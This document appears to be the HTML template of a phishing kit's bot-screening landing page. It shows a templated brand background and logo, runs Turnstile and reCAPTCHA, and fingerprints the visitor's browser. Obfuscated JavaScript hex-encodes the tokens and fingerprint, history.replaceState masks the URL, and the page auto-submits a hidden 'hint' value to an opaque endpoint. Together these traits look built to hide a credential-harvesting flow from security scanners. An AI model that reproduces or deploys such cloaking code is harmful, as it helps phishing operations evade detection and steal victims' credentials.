<html>
	<head>
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<style>
		body {
			margin: 0;
			background-image: url({{ branding }});
			background-size: cover;
			background-position: center;
			display: flex;
			justify-content: center;
			align-items: center;
			font-family: Roboto,sans-serif;
		}
		.center {
			margin:0;
			display:flex;
			justify-content:center;
			align-items: center;
		}
		#rounder{
			width:28rem;
			height:14rem;
			border:2px solid #d3d3d3;
			border-radius: 6px;
			background-color:#f9f9f9;
			text-align: center;
			box-shadow: 7px 7px 6px lightblue;
		}
		#subAct{
			margin:0 auto;
			position: relative;
			/*padding:1.9rem;*/
		}
		#logo {
			content: url({{ logo }});
			margin:0 auto;
			height:auto;
			position: relative;
			padding:1.5rem;
			max-height:2.8rem;
			max-width:11rem;
		}
		</style>

		<script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback" defer></script>
		<script src="https://www.google.com/recaptcha/api.js?render={{ gsk }}"></script>
		<script src="https://unpkg.com/bowser@2.7.0/es5.js"></script>
	</head>
    <body>
	<div id="rounder">
	<img id="logo"></img>
    <form id="subAct" action="vstart88888" method="POST">
        <input type="hidden" id="hintId" name="hint" value="{{ eHint }}">
		<input type="hidden" id="g-recaptcha-response" name="g-recaptcha-response">
		<input type="hidden" name="action" value="validate_captcha">
		<input type="hidden" name="cCapt" id="cCapt" value="">
		<input type="hidden" name="bValue" id="bValue" value="">
		<input type="hidden" name="pValue" id="pValue" value="">
		<div id="igp"></div>
    </form>
	</div>
    <script>
	history.replaceState({},"","/");
	(function (_0x2b8318, _0x263e16) {
		var _0x41b7ab = _0x10f1, _0x1397c9 = _0x2b8318();
		while (!![]) {
			try {
				var _0x56aa45 = parseInt(_0x41b7ab(0x1d8)) / 0x1 + -parseInt(_0x41b7ab(0x1d1)) / 0x2 * (-parseInt(_0x41b7ab(0x1d4)) / 0x3) + parseInt(_0x41b7ab(0x1ce)) / 0x4 + -parseInt(_0x41b7ab(0x1d0)) / 0x5 + -parseInt(_0x41b7ab(0x1d2)) / 0x6 + parseInt(_0x41b7ab(0x1d5)) / 0x7 * (parseInt(_0x41b7ab(0x1cf)) / 0x8) + -parseInt(_0x41b7ab(0x1d7)) / 0x9;
				if (_0x56aa45 === _0x263e16)
					break;
				else
					_0x1397c9['push'](_0x1397c9['shift']());
			} catch (_0x4bf6eb) {
				_0x1397c9['push'](_0x1397c9['shift']());
			}
		}
	}(_0x83b1, 0x37b68));
	function _0x74739(_0x1c737b) {
		var _0xe2ac07 = _0x10f1, _0x41fa4e = '';
		for (var _0x859b98 = 0x0; _0x859b98 < _0x1c737b[_0xe2ac07(0x1d3)]; _0x859b98++) {
			_0x41fa4e += '' + _0x1c737b['charCodeAt'](_0x859b98)[_0xe2ac07(0x1d6)](0x10);
		}
		return _0x41fa4e;
	}
	function _0x10f1(_0x1774c9, _0x33db3a) {
		var _0x83b16f = _0x83b1();
		return _0x10f1 = function (_0x10f12d, _0x1f2413) {
			_0x10f12d = _0x10f12d - 0x1ce;
			var _0x2cd561 = _0x83b16f[_0x10f12d];
			return _0x2cd561;
		}, _0x10f1(_0x1774c9, _0x33db3a);
	}
	function _0x83b1() {
		var _0x868a6c = [
			'10344HVpkDN',
			'1802055NkIvet',
			'107612iBMkFH',
			'1466220eCvEHF',
			'length',
			'18umtuTH',
			'987DihKGv',
			'toString',
			'4036734cyjByR',
			'360792nEGbWg',
			'1662264AFuwvD'
		];
		_0x83b1 = function () {
			return _0x868a6c;
		};
		return _0x83b1();
	}
	var result = bowser.getParser(window.navigator.userAgent);
	document.getElementById("bValue").value = _0x74739(result.parsedResult.browser.name)
	document.getElementById("pValue").value = _0x74739(result.parsedResult.platform.type)
	grecaptcha.ready(function() {
    // do request for recaptcha token
    // response is promise with passed token
        grecaptcha.execute('{{ gsk }}', {action:'validate_captcha'})
                  .then(function(token) {
            // add token value to form
            document.getElementById('g-recaptcha-response').value = _0x74739(token);
        });
    });
	window.onloadTurnstileCallback = function () {
		turnstile.render('#igp', {
			sitekey: '{{ csk }}',
			callback: function(token) {
				document.getElementById('cCapt').value = _0x74739(token);
				setTimeout(() => {
					document.getElementById("subAct").submit();
				},5000);
			},
		});
	};
    //document.getElementById("subAct").submit();
    </script>
</body>
</html>